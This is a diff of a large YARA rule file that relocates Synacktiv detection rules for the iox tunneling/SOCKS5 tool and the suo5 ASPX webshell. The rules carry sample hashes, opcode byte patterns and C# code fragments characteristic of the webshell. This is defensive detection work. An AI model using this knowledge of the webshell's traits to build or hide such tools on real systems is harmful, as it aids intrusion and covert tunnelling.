 THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES.
  */
-rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_GO_Iox_May25 : COMMODITY FILE
-{
-	meta:
-		description = "Detects the iox tunneling tool used for port forwarding and SOCKS5 proxy"
-		author = "Synacktiv, Maxence Fossat [@cybiosity]"
-		id = "407d4f90-a281-4f0c-8d8e-ebe45217d3d9"
-		date = "2025-05-12"
-		modified = "2025-05-12"
-		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
-		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/hktl_tunnel_go_iox.yar#L1-L49"
-		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
-		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
-		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
-		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
-		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
-		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
-		hash = "35d83137ea70e94187a9ad9b7fa2d7b6c6b9128eb9d104380f2ac525784b9a78"
-		hash = "4806fd64647e02a34dd49f9057c6bf95325dcc923764ff2ef61cbbab40ca8c48"
-		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
-		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
-		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
-		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
-		hash = "9480d060de29548bcf961267cec1e8c926b99dc93b65fd696bbedd308ad9f85f"
-		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
-		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
-		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
-		hash = "ba661b3f18fa7865503523ce514367e05626c088a34c6c29269e3bde57d00ec3"
-		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
-		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
-		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
-		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
-		hash = "cd5bbcf663f06003637e4aab348bbec3d4a47e53e8fa85826e161d34b86e93f8"
-		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
-		hash = "e92c85b36d0848171ada787862413e0edd8291c8ae6a43e13b075b9ccbd53434"
-		hash = "f22f2932c02bbd47ea556e15a51c20301ca7084c4b943672ade70bc49dc3e0c4"
-		logic_hash = "39b68d6920b83e36942456b8ff0eeff18ae280e13e86df916c3586922d79aba8"
-		score = 75
-		quality = 80
-		tags = "COMMODITY, FILE"
-		license = "DRL-1.1"
-		tlp = "TLP:CLEAR"
-		pap = "PAP:CLEAR"
-
-	strings:
-		$s1 = "Forward UDP traffic between %s (encrypted: %v) and %s (encrypted: %v)"
-		$s2 = "Open pipe: %s <== FWD ==> %s"
-		$s3 = "Reverse socks5 server handshake ok from %s (encrypted: %v)"
-		$s4 = "Recv exit signal from remote, exit now"
-		$s5 = "socks consult transfer mode or parse target: %s"
-
-	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcefaedfe ) and filesize < 5MB and all of them
-}
-rule SYNACKTIV_SYNACKTIV_WEBSHELL_ASPX_Suo5_May25 : WEBSHELL COMMODITY FILE
-{
-	meta:
-		description = "Detects the .NET version of the suo5 webshell"
-		author = "Synacktiv, Maxence Fossat [@cybiosity]"
-		id = "d30a7232-f00b-45ab-9419-f43b1611445a"
-		date = "2025-05-12"
-		modified = "2025-05-12"
-		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
-		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/webshell_aspx_suo5.yar#L1-L46"
-		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
-		hash = "06710575d20cacd123f83eb82994879367e07f267e821873bf93f4db6312a97b"
-		hash = "e6979d7df0876679fc2481aa68fcec5b6ddc82d854f63da2bddb674064384f9a"
-		hash = "3bbbef1b4ead98c61fba60dd6291fe1ff08f5eac54d820e47c38d348e4a7b1ec"
-		hash = "345c383dd439eb523b01e1087a0866e13f04ff53bb8cc11f3c70b4a382f10c7e"
-		hash = "838840dd76ff34cee45996fdc9a87856c9a0f14138e65cb9eb6603ed157d1515"
-		hash = "d9657ac8dd562bdd39e8fcc1fff37ddced10f7f3f118d9cd4da6118a223dcc45"
-		logic_hash = "68dc29b2cedc26e638eaa12bf2a2d0415de323097baf5ea61dba52bd20b5beee"
-		score = 75
-		quality = 80
-		tags = "WEBSHELL, COMMODITY, FILE"
-		license = "DRL-1.1"
-		tlp = "TLP:CLEAR"
-		pap = "PAP:CLEAR"
-
-	strings:
-		$user_agent = ".Equals(\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3\")" ascii
-		$header = "Response.AddHeader(\"X-Accel-Buffering\", \"no\")" ascii
-		$xor = /= \(byte\)\(\w{1,1023}\[\w{1,1023}\] \^ \w{1,1023}\);/
-		$s1 = "Request.Headers.Get(\"User-Agent\")" ascii
-		$s2 = "if (Request.ContentType.Equals(\"application/plain\"))" ascii
-		$s3 = "Response.ContentType = \"application/octet-stream\";" ascii
-		$s4 = "= Request.BinaryRead(Request.ContentLength);" ascii
-		$s5 = "= Response.OutputStream;" ascii
-		$s6 = "new TcpClient()" ascii
-		$s7 = ".BeginConnect(" ascii
-		$s8 = ".GetStream().Write(" ascii
-		$s9 = "new BinaryWriter(" ascii
-		$s10 = "new BinaryReader(" ascii
-		$s11 = ".ReadBytes(4)" ascii
-		$s12 = "BitConverter.GetBytes((Int32)" ascii
-		$s13 = "BitConverter.ToInt32(" ascii
-		$s14 = "Array.Reverse(" ascii
-		$s15 = "new Random().NextBytes(" ascii
-
-	condition:
-		filesize < 100KB and ( $user_agent or ( ( $header or $xor ) and 8 of ( $s* ) ) or 12 of ( $s* ) )
-}
-rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_X64_GO_Iox_May25 : COMMODITY FILE
-{
-	meta:
-		description = "Detects the 64-bits version of the iox tunneling tool used for port forwarding and SOCKS5 proxy"
-		author = "Synacktiv, Maxence Fossat [@cybiosity]"
-		id = "0b5a4689-58ea-45d5-aa14-a1455276352a"
-		date = "2025-05-12"
-		modified = "2025-05-12"
-		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
-		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/hktl_tunnel_x64_go_iox.yar#L1-L96"
-		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
-		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
-		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
-		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
-		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
-		hash = "2457a3241ec13c77b4132d6c5923e63b51a4d05a96dc0ae249c92a43ed9c7c04"
-		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
-		hash = "39d51ef91e189de44696ac67590b4251a6a320719668399127096dc57cbecba3"
-		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
-		hash = "4d1e87b372af0f52b9e2d7a2ac1d223575d29de5e3c0570a96b0d2ff346214f0"
-		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
-		hash = "5138090aee794a08de4b0482bbe58adbd918467d14dedf51961963b324e63f89"
-		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
-		hash = "79d6dfacfa0e0e5bc48d8d894dae261b9412b9c04a39b6ebf992cb8a5a40de95"
-		hash = "82aec8846232a43a77e2b5c5a80de523b2c7f912d60bce3ac28242156395b9d0"
-		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
-		hash = "9e3cba612d5f69e27534e3d2ceb7bb6067d44ac93e5b1e74bf994a94dfd706b6"
-		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
-		hash = "a8bda8e1d39ee61998381a2f0bfeb7069b19035551b8895eb48642bf98ade3d1"
-		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
-		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
-		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
-		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
-		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
-		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
-		hash = "d3190648bc428640a721b7d3c2b05c56e855355e8b44561e3b701e80e97f7ea7"
-		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
-		hash = "d9e868af5567a8c823f48f0f30440f1a9d77b52b2e6d785e116c450c48df9fc6"
-		logic_hash = "adf3e21aa146b3def9baa73829126d8738db9cedb96e783a6baa589c77d7d518"
-		score = 75
-		quality = 80
-		tags = "COMMODITY, FILE"
-		license = "DRL-1.1"
-		tlp = "TLP:CLEAR"
-		pap = "PAP:CLEAR"
-
-	strings:
-		$expand_key = {
-            ( 48 8B 84 24 | 48 8B 9C 24 | 48 8B 8C 24 | 48 8B BC 24 | 48 8B B4 24 | 4C 8B 84 24 | 4C 8B 8C 24 | 4C 8B 94 24 | 4C 8B 9C 24 ) ?? ?? ?? ??
-            ( 48 83 F8 20 | 48 83 FB 20 | 48 83 F9 20 | 48 83 FF 20 | 48 83 FE 20 | 49 83 F8 20 | 49 83 F9 20 | 49 83 FA 20 | 49 83 FB 20 )
-            ( 0F 8D ?? ?? ?? ?? | 7D ?? )
-            ( 48 89 ?? | 49 89 ?? | 4C 89 ?? | 4D 89 ?? )
-            ( 48 83 E0 1F | 48 83 E3 1F | 48 83 E1 1F | 48 83 E7 1F | 48 83 E6 1F | 49 83 E0 1F | 49 83 E1 1F | 49 83 E2 1F | 49 83 E3 1F | 83 E0 1F | 83 E3 1F | 83 E1 1F | 83 E7 1F | 83 E6 1F | 41 83 E0 1F | 41 83 E1 1F | 41 83 E2 1F | 41 83 E3 1F )
-            ( 83 C0 E0 | 83 C3 E0 | 83 C1 E0 | 83 C7 E0 | 83 C6 E0 | 41 83 C0 E0 | 41 83 C1 E0 | 41 83 C2 E0 | 41 83 C3 E0 )
-            ( F7 D8 | F7 DB | F7 D9 | F7 DF | F7 DE | 41 F7 D8 | 41 F7 D9 | 41 F7 DA | 41 F7 DB )
-        }
-		$shuffle = {
-            ( 44 0F B6 04 | 44 0F B6 0C | 44 0F B6 14 | 44 0F B6 1C | 44 0F B6 44 | 44 0F B6 4C | 44 0F B6 54 | 44 0F B6 5C | 46 0F B6 04 | 46 0F B6 0C | 46 0F B6 14 | 46 0F B6 1C | 46 0F B6 44 | 46 0F B6 4C | 46 0F B6 54 | 46 0F B6 5C ) [1-2]
-            ( 45 0F AF C0 | 45 0F AF C1 | 45 0F AF C2 | 45 0F AF C3 | 45 0F AF C8 | 45 0F AF C9 | 45 0F AF CA | 45 0F AF CB | 45 0F AF D0 | 45 0F AF D1 | 45 0F AF D2 | 45 0F AF D3 | 45 0F AF D8 | 45 0F AF D9 | 45 0F AF DA | 45 0F AF DB | 44 0F AF C0 | 44 0F AF C1 | 44 0F AF C2 | 44 0F AF C3 | 44 0F AF C8 | 44 0F AF C9 | 44 0F AF CA | 44 0F AF CB | 44 0F AF D0 | 44 0F AF D1 | 44 0F AF D2 | 44 0F AF D3 | 44 0F AF D8 | 44 0F AF D9 | 44 0F AF DA | 44 0F AF DB )
-            [0-4]
-            ( 41 B8 | 41 B9 | 41 BA | 41 BB ) FF FF FF FF
-            ( 45 0F B6 C0 | 45 0F B6 C1 | 45 0F B6 C2 | 45 0F B6 C3 | 45 0F B6 C8 | 45 0F B6 C9 | 45 0F B6 CA | 45 0F B6 CB | 45 0F B6 D0 | 45 0F B6 D1 | 45 0F B6 D2 | 45 0F B6 D3 | 45 0F B6 D8 | 45 0F B6 D9 | 45 0F B6 DA | 45 0F B6 DB )
-            [0-4]
-            ( 41 89 D0 | 41 89 D1 | 41 89 D2 | 41 89 D3 | 89 D0 | 89 D1 | 89 D2 | 89 D3 )
-            31 D2
-            ( 66 41 F7 F0 | 66 41 F7 F1 | 66 41 F7 F2 | 66 41 F7 F3 )
-            ( 41 0F AF D0 | 41 0F AF D1 | 41 0F AF D2 | 41 0F AF D3 | 44 0F AF C2 | 44 0F AF CA | 44 0F AF D2 | 44 0F AF DA | 0F AF D0 | 0F AF D1 | 0F AF D2 | 0F AF D3 | 0F AF C2 | 0F AF CA | 0F AF D2 | 0F AF DA )
-            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
-            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
-            ( 44 88 04 ?F | 44 88 0C ?F | 44 88 14 ?F | 44 88 1C ?F | 44 88 04 ?7 | 44 88 0C ?7 | 44 88 14 ?7 | 44 88 1C ?7 | 88 04 ?F | 88 0C ?F | 88 14 ?F | 88 1C ?F | 88 04 ?7 | 88 0C ?7 | 88 14 ?7 | 88 1C ?7 | 44 88 04 3? | 44 88 0C 3? | 44 88 14 3? | 44 88 1C 3? | 88 04 3? | 88 0C 3? | 88 14 3? | 88 1C 3? )
-        }
-
-	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 5MB and all of them
-}
 
 rule SYNACKTIV_MAL_Linkpro_ELF_Rootkit_Golang_Oct25 : FILE
 {
@@ -260492,11 +260439,187 @@ rule SYNACKTIV_MAL_Linkpro_Arpdiag_ELF_KO_Oct25 : FILE
 	condition:
 		uint32( 0 ) == 0x464c457f and filesize < 2MB and elf.type == elf.ET_REL and $ftrace and 2 of ( $hook* ) and 1 of ( $hide* )
 }
+rule SYNACKTIV_SYNACKTIV_WEBSHELL_ASPX_Suo5_May25 : WEBSHELL COMMODITY FILE
+{
+	meta:
+		description = "Detects the .NET version of the suo5 webshell"
+		author = "Synacktiv, Maxence Fossat [@cybiosity]"
+		id = "d30a7232-f00b-45ab-9419-f43b1611445a"
+		date = "2025-05-12"
+		modified = "2025-05-12"
+		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
+		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/webshell_aspx_suo5.yar#L1-L46"
+		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
+		hash = "06710575d20cacd123f83eb82994879367e07f267e821873bf93f4db6312a97b"
+		hash = "e6979d7df0876679fc2481aa68fcec5b6ddc82d854f63da2bddb674064384f9a"
+		hash = "3bbbef1b4ead98c61fba60dd6291fe1ff08f5eac54d820e47c38d348e4a7b1ec"
+		hash = "345c383dd439eb523b01e1087a0866e13f04ff53bb8cc11f3c70b4a382f10c7e"
+		hash = "838840dd76ff34cee45996fdc9a87856c9a0f14138e65cb9eb6603ed157d1515"
+		hash = "d9657ac8dd562bdd39e8fcc1fff37ddced10f7f3f118d9cd4da6118a223dcc45"
+		logic_hash = "68dc29b2cedc26e638eaa12bf2a2d0415de323097baf5ea61dba52bd20b5beee"
+		score = 75
+		quality = 80
+		tags = "WEBSHELL, COMMODITY, FILE"
+		license = "DRL-1.1"
+		tlp = "TLP:CLEAR"
+		pap = "PAP:CLEAR"
+
+	strings:
+		$user_agent = ".Equals(\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3\")" ascii
+		$header = "Response.AddHeader(\"X-Accel-Buffering\", \"no\")" ascii
+		$xor = /= \(byte\)\(\w{1,1023}\[\w{1,1023}\] \^ \w{1,1023}\);/
+		$s1 = "Request.Headers.Get(\"User-Agent\")" ascii
+		$s2 = "if (Request.ContentType.Equals(\"application/plain\"))" ascii
+		$s3 = "Response.ContentType = \"application/octet-stream\";" ascii
+		$s4 = "= Request.BinaryRead(Request.ContentLength);" ascii
+		$s5 = "= Response.OutputStream;" ascii
+		$s6 = "new TcpClient()" ascii
+		$s7 = ".BeginConnect(" ascii
+		$s8 = ".GetStream().Write(" ascii
+		$s9 = "new BinaryWriter(" ascii
+		$s10 = "new BinaryReader(" ascii
+		$s11 = ".ReadBytes(4)" ascii
+		$s12 = "BitConverter.GetBytes((Int32)" ascii
+		$s13 = "BitConverter.ToInt32(" ascii
+		$s14 = "Array.Reverse(" ascii
+		$s15 = "new Random().NextBytes(" ascii
+
+	condition:
+		filesize < 100KB and ( $user_agent or ( ( $header or $xor ) and 8 of ( $s* ) ) or 12 of ( $s* ) )
+}
+rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_X64_GO_Iox_May25 : COMMODITY FILE
+{
+	meta:
+		description = "Detects the 64-bits version of the iox tunneling tool used for port forwarding and SOCKS5 proxy"
+		author = "Synacktiv, Maxence Fossat [@cybiosity]"
+		id = "0b5a4689-58ea-45d5-aa14-a1455276352a"
+		date = "2025-05-12"
+		modified = "2025-05-12"
+		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
+		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/hktl_tunnel_x64_go_iox.yar#L1-L96"
+		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
+		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
+		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
+		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
+		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
+		hash = "2457a3241ec13c77b4132d6c5923e63b51a4d05a96dc0ae249c92a43ed9c7c04"
+		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
+		hash = "39d51ef91e189de44696ac67590b4251a6a320719668399127096dc57cbecba3"
+		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
+		hash = "4d1e87b372af0f52b9e2d7a2ac1d223575d29de5e3c0570a96b0d2ff346214f0"
+		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
+		hash = "5138090aee794a08de4b0482bbe58adbd918467d14dedf51961963b324e63f89"
+		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
+		hash = "79d6dfacfa0e0e5bc48d8d894dae261b9412b9c04a39b6ebf992cb8a5a40de95"
+		hash = "82aec8846232a43a77e2b5c5a80de523b2c7f912d60bce3ac28242156395b9d0"
+		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
+		hash = "9e3cba612d5f69e27534e3d2ceb7bb6067d44ac93e5b1e74bf994a94dfd706b6"
+		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
+		hash = "a8bda8e1d39ee61998381a2f0bfeb7069b19035551b8895eb48642bf98ade3d1"
+		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
+		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
+		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
+		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
+		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
+		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
+		hash = "d3190648bc428640a721b7d3c2b05c56e855355e8b44561e3b701e80e97f7ea7"
+		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
+		hash = "d9e868af5567a8c823f48f0f30440f1a9d77b52b2e6d785e116c450c48df9fc6"
+		logic_hash = "adf3e21aa146b3def9baa73829126d8738db9cedb96e783a6baa589c77d7d518"
+		score = 75
+		quality = 80
+		tags = "COMMODITY, FILE"
+		license = "DRL-1.1"
+		tlp = "TLP:CLEAR"
+		pap = "PAP:CLEAR"
+
+	strings:
+		$expand_key = {
+            ( 48 8B 84 24 | 48 8B 9C 24 | 48 8B 8C 24 | 48 8B BC 24 | 48 8B B4 24 | 4C 8B 84 24 | 4C 8B 8C 24 | 4C 8B 94 24 | 4C 8B 9C 24 ) ?? ?? ?? ??
+            ( 48 83 F8 20 | 48 83 FB 20 | 48 83 F9 20 | 48 83 FF 20 | 48 83 FE 20 | 49 83 F8 20 | 49 83 F9 20 | 49 83 FA 20 | 49 83 FB 20 )
+            ( 0F 8D ?? ?? ?? ?? | 7D ?? )
+            ( 48 89 ?? | 49 89 ?? | 4C 89 ?? | 4D 89 ?? )
+            ( 48 83 E0 1F | 48 83 E3 1F | 48 83 E1 1F | 48 83 E7 1F | 48 83 E6 1F | 49 83 E0 1F | 49 83 E1 1F | 49 83 E2 1F | 49 83 E3 1F | 83 E0 1F | 83 E3 1F | 83 E1 1F | 83 E7 1F | 83 E6 1F | 41 83 E0 1F | 41 83 E1 1F | 41 83 E2 1F | 41 83 E3 1F )
+            ( 83 C0 E0 | 83 C3 E0 | 83 C1 E0 | 83 C7 E0 | 83 C6 E0 | 41 83 C0 E0 | 41 83 C1 E0 | 41 83 C2 E0 | 41 83 C3 E0 )
+            ( F7 D8 | F7 DB | F7 D9 | F7 DF | F7 DE | 41 F7 D8 | 41 F7 D9 | 41 F7 DA | 41 F7 DB )
+        }
+		$shuffle = {
+            ( 44 0F B6 04 | 44 0F B6 0C | 44 0F B6 14 | 44 0F B6 1C | 44 0F B6 44 | 44 0F B6 4C | 44 0F B6 54 | 44 0F B6 5C | 46 0F B6 04 | 46 0F B6 0C | 46 0F B6 14 | 46 0F B6 1C | 46 0F B6 44 | 46 0F B6 4C | 46 0F B6 54 | 46 0F B6 5C ) [1-2]
+            ( 45 0F AF C0 | 45 0F AF C1 | 45 0F AF C2 | 45 0F AF C3 | 45 0F AF C8 | 45 0F AF C9 | 45 0F AF CA | 45 0F AF CB | 45 0F AF D0 | 45 0F AF D1 | 45 0F AF D2 | 45 0F AF D3 | 45 0F AF D8 | 45 0F AF D9 | 45 0F AF DA | 45 0F AF DB | 44 0F AF C0 | 44 0F AF C1 | 44 0F AF C2 | 44 0F AF C3 | 44 0F AF C8 | 44 0F AF C9 | 44 0F AF CA | 44 0F AF CB | 44 0F AF D0 | 44 0F AF D1 | 44 0F AF D2 | 44 0F AF D3 | 44 0F AF D8 | 44 0F AF D9 | 44 0F AF DA | 44 0F AF DB )
+            [0-4]
+            ( 41 B8 | 41 B9 | 41 BA | 41 BB ) FF FF FF FF
+            ( 45 0F B6 C0 | 45 0F B6 C1 | 45 0F B6 C2 | 45 0F B6 C3 | 45 0F B6 C8 | 45 0F B6 C9 | 45 0F B6 CA | 45 0F B6 CB | 45 0F B6 D0 | 45 0F B6 D1 | 45 0F B6 D2 | 45 0F B6 D3 | 45 0F B6 D8 | 45 0F B6 D9 | 45 0F B6 DA | 45 0F B6 DB )
+            [0-4]
+            ( 41 89 D0 | 41 89 D1 | 41 89 D2 | 41 89 D3 | 89 D0 | 89 D1 | 89 D2 | 89 D3 )
+            31 D2
+            ( 66 41 F7 F0 | 66 41 F7 F1 | 66 41 F7 F2 | 66 41 F7 F3 )
+            ( 41 0F AF D0 | 41 0F AF D1 | 41 0F AF D2 | 41 0F AF D3 | 44 0F AF C2 | 44 0F AF CA | 44 0F AF D2 | 44 0F AF DA | 0F AF D0 | 0F AF D1 | 0F AF D2 | 0F AF D3 | 0F AF C2 | 0F AF CA | 0F AF D2 | 0F AF DA )
+            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
+            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
+            ( 44 88 04 ?F | 44 88 0C ?F | 44 88 14 ?F | 44 88 1C ?F | 44 88 04 ?7 | 44 88 0C ?7 | 44 88 14 ?7 | 44 88 1C ?7 | 88 04 ?F | 88 0C ?F | 88 14 ?F | 88 1C ?F | 88 04 ?7 | 88 0C ?7 | 88 14 ?7 | 88 1C ?7 | 44 88 04 3? | 44 88 0C 3? | 44 88 14 3? | 44 88 1C 3? | 88 04 3? | 88 0C 3? | 88 14 3? | 88 1C 3? )
+        }
+
+	condition:
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 5MB and all of them
+}
+rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_GO_Iox_May25 : COMMODITY FILE
+{
+	meta:
+		description = "Detects the iox tunneling tool used for port forwarding and SOCKS5 proxy"
+		author = "Synacktiv, Maxence Fossat [@cybiosity]"
+		id = "407d4f90-a281-4f0c-8d8e-ebe45217d3d9"
+		date = "2025-05-12"
+		modified = "2025-05-12"
+		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
+		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/2025/offensive_tools/hktl_tunnel_go_iox.yar#L1-L49"
+		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/d234cc4da0783db7dca56ae8dd5252afdc248df8/LICENSE.md"
+		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
+		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
+		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
+		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
+		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
+		hash = "35d83137ea70e94187a9ad9b7fa2d7b6c6b9128eb9d104380f2ac525784b9a78"
+		hash = "4806fd64647e02a34dd49f9057c6bf95325dcc923764ff2ef61cbbab40ca8c48"
+		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
+		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
+		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
+		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
+		hash = "9480d060de29548bcf961267cec1e8c926b99dc93b65fd696bbedd308ad9f85f"
+		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
+		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
+		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
+		hash = "ba661b3f18fa7865503523ce514367e05626c088a34c6c29269e3bde57d00ec3"
+		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
